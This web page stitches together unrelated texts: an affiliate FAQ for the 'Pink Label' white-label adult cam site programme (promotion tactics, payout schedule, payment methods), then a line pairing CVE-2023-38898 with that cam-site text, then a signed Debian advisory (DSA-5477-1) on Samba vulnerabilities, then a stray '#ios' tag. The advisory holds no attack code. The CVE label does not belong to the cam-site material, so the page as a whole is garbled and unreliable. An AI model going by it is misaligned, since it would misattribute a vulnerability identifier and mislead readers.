You can give your white label cam site its own look/feel and run it like your own brand on your own Internet (sub)domain. With the right strategy and maintenance you can create a source of income by promoting your own white label cam site.

****How do I make money?****

Search Engine Optimalisation (SEO) is going to be your best friend. The first step is to submit your white label cam site to Google and other search engines, you'll gain a steady stream of organic traffic.

By building backlinks to your white label cam site, you'll get better rankings on the search engines.

Social media is another great avenue for promotion. Networks such as Twitter are adult friendly and will let you post nude or hardcore content. Other social networks only accept SFW content.

By frequently linking new content on social media networks to your white label cam site, you can drive traffic and get new customers.

If you are willing to spend a little bit of money on advertising, you can register as an advertiser for adult advertising networks and drive traffic that way.

By playing around with different display ad types, pop-unders, landings pages and other ads, you will find a converting combination that refers valuable customers for the best price possible.

You also might want to join adult forums, chatroom and other sites that can be a good way to drive quality traffic for free.

At Pink Label you can select between a revenue share or PPL pay-per-lead monetization payout model.

****How can I start and what do I need?****

The first step is to register on Pink Label.

Depending on the number of white label cam sites you want to start you would need one or more Internet domains, logos for your site, Google Analytic codes and you would need to submit your domain(s) for Google verification.

It's also recommended to create accounts on social media (for example Twitter) to promote your white label cam site with relevant posts.

****Can I upload my own banners and create text links?****

At the moment it isn't possible to upload your own banners or create custom text links on your own white label cam site.

These features will be available within a couple of months.

****Can I have my own cam site as a performer or webcam studio?****

We are working to offer performers and webcam studios their own white label cam site solution and expect this will be ready within a couple of months.

****When do I get paid?****

Payouts will be done on the 1st and 16th of the month. There will be a 2 week holding period before payouts begin. Your account must hit the $250 minimum payout.

****What pay out methods do you provide?****

Currently affiliates are paid by wire or paxum. ACH and epay will be available shortly.

**Wanna say hello?****Get In Touch**

**Company**

**Surecom Corporation NV**

CVE-2023-38898: Pink Label, create your own cam site

Debian Linux Security Advisory 5477-1 - Several vulnerabilities have been discovered in Samba, which could result in information disclosure, denial of service or insufficient enforcement of security-relevant config directives.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5477-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 14, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : samba  
CVE ID         : CVE-2022-2127 CVE-2023-3347 CVE-2023-34966 CVE-2023-34967   
                 CVE-2023-34968  
Debian Bug     : 1041043

Several vulnerabilities have been discovered in Samba, which could result  
in information disclosure, denial of service or insufficient enforcement  
of security-relevant config directives.

The version of Samba in the oldstable distribution (bullseye) cannot be  
fully supported further: If you are using Samba as a domain controller  
you should either upgrade to the stable distribution or if that's not  
an immediate option consider to migrate to Samba from bullseye-backports  
(which will be kept updated to the version in stable). Operating Samba  
as a file/print server will continue to be supported, a separate DSA  
will provide an update update along with documentation about the scope  
of continued support.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:4.17.10+dfsg-0+deb12u1.

We recommend that you upgrade your samba packages.

For the detailed security status of samba please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/samba

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTadJsACgkQEMKTtsN8  
TjamWhAAr1DOVp9DBJATMyIq2Dqcv9O6x4ipPU/NE0oLG95m9b2kTgakUuj+wQLP  
mVfbVi1n9IuRDWW16BH4b63gEx2Yvul4jDBJr42WzawBJVdnQhvNCUavmWgsdCiJ  
jc8+bSAiYYN0p076G1AoIastRPoXGjX1tQ/b1iFHG8tC9qX6qCdJy7GFlPClQqYs  
K0DdLLj1iz872rlL14zi4znHz3Gsf8d+TNmMVfMqG3aswHiYbrKd954c3/zv51zC  
DSm85I6YSgi4+4oCLqJbjlfCFFV+68U5PW86XhPSjHBA6//cvFtIdxVjqisQtV6T  
q+kPIMybAkdmG8Z+XLaPIOsBty957XMIYp0S84wTIX/MhlQ+Z6Jns5bU6yQJYN78  
ZUqamCFGMEIPO7srQDUWEG77wOJ1Jvlj70sV7Zaz9XJkGlZamJsHMBE5rlg0glKr  
gogApnCbiQgKwJcbYxjdM2CKPg8329J0Mt9HqQFxBQC0Ig005+7B+zZUMMpRdQni  
HLRgZ4deBWAP3dowt/wSfcNgqOg2SyCKPm4nSllhkesXcJwUGPAktoRNhorxMqiN  
dmOAvfYZu+HaPYKVnsdfsjUlI0Z0n+QTsaen48cAYNClNeLQySW3zpEkSqWkNJ/S  
YCPU6KabOxeXFjl2LVUTy0FHdO4fnqZJo/egS0ydgkv0t8Iwja4=  
=Roie  
-----END PGP SIGNATURE-----

Tag

#ios